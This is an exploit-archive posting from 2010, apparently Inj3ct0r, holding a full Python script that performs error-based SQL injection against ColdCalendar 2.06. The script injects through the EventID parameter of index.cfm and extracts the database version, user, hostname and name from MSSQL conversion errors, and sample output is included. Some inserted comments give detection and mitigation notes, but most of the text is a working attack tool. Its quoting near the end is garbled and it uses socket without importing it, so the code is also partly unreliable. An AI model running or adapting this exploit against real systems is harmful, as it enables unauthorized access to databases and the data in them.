
ColdCalendar 2.06 SQL Injection Exploit

Posted on 07 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ColdCalendar 2.06 SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================
ColdCalendar 2.06 SQL Injection Exploit
=======================================
#!/usr/bin/python
# ColdGen - coldcalender v2.06 Remote 0day SQL Injection Exploit
# Vendor: http://www.coldgen.com/
# Found by: mr_me
# ----------------------------------------------->
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# ----------------------------------------------->
# The vulnerability:
# ===================
# - SQL Injection in the index.cfm using parameters: EventID
#
# This tool assumes the target has a MSSQL backend.
# ./ColdCal0day.py -p localhost:8080 -t localhost:8500 -d /coldcal/
#
# | ----------------------------------------------------------- |
# | -= ColdCalender v2.06 Remote 0day SQL Injection Exploit =- |
# | --------------[ by mr_me - net-ninja.net ]----------------- |
#
# (+) Exploiting target @: http://localhost:8500/coldcal/
#
# (+) Testing Proxy...
# (+) Proxy @ localhost:8080
# (+) Building Handler..
#
# (!) Found database version:
#
# Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
# Aug 19 2006 20:47:07
# Copyright (c) 1988-2005 Microsoft Corporation
# Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
#
# (!) Found database hostname: 127.0.0.1
#
# (!) Found database user: sa
#
# (!) Found database name: coldcal
#
# Reviewer notes (defensive reading of this listing):
# - Injection point: the EventID query parameter of index.cfm (see
#   basicSploit below). The payload is error-based: it wraps an MSSQL
#   built-in in convert(int, ...) so the server raises a type-conversion
#   error, and the leaked value travels in that error text, which the
#   application echoes to the client.
# - Detection: look for "convert(int," / "and+1=" in the EventID parameter
#   on requests, and for responses containing "the nvarchar value '" ...
#   "' to data type int" (verbose DB errors reaching the client).
# - Mitigation: bind EventID as an integer query parameter (in ColdFusion,
#   <cfqueryparam cfsqltype="cf_sql_integer">) and stop returning raw
#   database error text in HTTP responses.
# - This listing was recovered from HTML: entities (&quot; &lt; &gt; &amp;)
#   are decoded here; the quoting in the split() calls near the end is
#   garbled in the captured page and is left exactly as found.

import sys, httplib, urllib2, urllib, re
from optparse import OptionParser

# Command-line contract: -p optional HTTP proxy, -t target host:port,
# -d application directory on the target.
usage = "./%prog [<options>] -t [target] -d [directory]"
usage += " Example: ./%prog -p localhost:8080 -t localhost:8500 -d /coldcal/"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy", help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target", help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory", help="Directory path to the CMS")
(options, args) = parser.parse_args()

def banner():
    # Prints the tool banner shown in the sample output above.
    print " | ----------------------------------------------------------- |"
    print " | -= ColdCalender v2.06 Remote 0day SQL Injection Exploit =- |"
    print " | --------------[ by mr_me - net-ninja.net ]----------------- | "

# Usage check runs at import time, before the functions below are defined:
# fewer than 5 argv entries means -t and -d cannot both be present.
if len(sys.argv) < 5:
    banner()
    parser.print_help()
    sys.exit(1)

def getProxy():
    # Opens a plain TCP connection to the configured proxy as a liveness
    # check, then returns a urllib2 ProxyHandler for it. Both failure
    # branches print a message and exit the process.
    try:
        pr = httplib.HTTPConnection(options.proxy)
        pr.connect()
        proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
    except(socket.timeout):
        print " (-) Proxy Timed Out"
        sys.exit(1)
    except(),msg:
        print " (-) Proxy Failed"
        sys.exit(1)
    return proxy_handler

def setTargetHTTP():
    # Normalises options.target to carry an http:// scheme; the value is
    # also written back to options.target as a side effect.
    if options.target[0:7] != 'http://':
        options.target = "http://" + options.target
    return options.target

def getRequest(exploit):
    # Fetches target + directory + exploit, via the proxy when -p was
    # given. HTTP error responses are kept (error.read()) rather than
    # discarded, because the oracle in __main__ matches on the error page
    # body; connection-level failures print a message and exit.
    if options.proxy:
        try:
            proxyfier = urllib2.build_opener(getProxy())
            check = proxyfier.open(options.target+options.directory+exploit).read()
        except urllib2.HTTPError, error:
            check = error.read()
        except socket.error:
            print "(-) Proxy connection failed"
            sys.exit(1)
    else:
        try:
            req = urllib2.Request(options.target+options.directory+exploit)
            check = urllib2.urlopen(req).read()
        except urllib2.HTTPError, error:
            check = error.read()
        except urllib2.URLError:
            print "(-) Target connection failed, check your address"
            sys.exit(1)
    return check

# Label -> MSSQL expression whose string result is forced through
# convert(int, ...) so the conversion error discloses it. Labels double as
# the text printed after "Found database ".
basicInfo = {'user: ':'user_name()', 'name: ':'db_name()', 'hostname: ':'host_name()','version: ':'@@version'}

def basicSploit(info):
    # Builds the query string for index.cfm: the injection rides in
    # EventID, and the trailing "--" comments out the rest of the query.
    return "index.cfm?fuseaction=ViewEventDetails&EventID=1+and+1=convert(int," + info + ")--"

if __name__ == "__main__":
    banner()
    options.target = setTargetHTTP()
    print "(+) Exploiting target @: %s" % (options.target+options.directory)
    if options.proxy:
        print " (+) Testing Proxy..."
        print "(+) Proxy @ %s" % (options.proxy)
        print "(+) Building Handler.."
    for key in basicInfo:
        getResp = getRequest(basicSploit(basicInfo[key]))
        # Oracle: MSSQL's conversion-error message quotes the offending
        # value between "the nvarchar value '" and "' to data type int".
        # Suppressing this error text on the server breaks the extraction.
        if re.findall("the nvarchar value '", getResp):
            dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type int')[0]
            print " (!) Found database %s%s" % (key, dbInfo.rstrip())
# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 
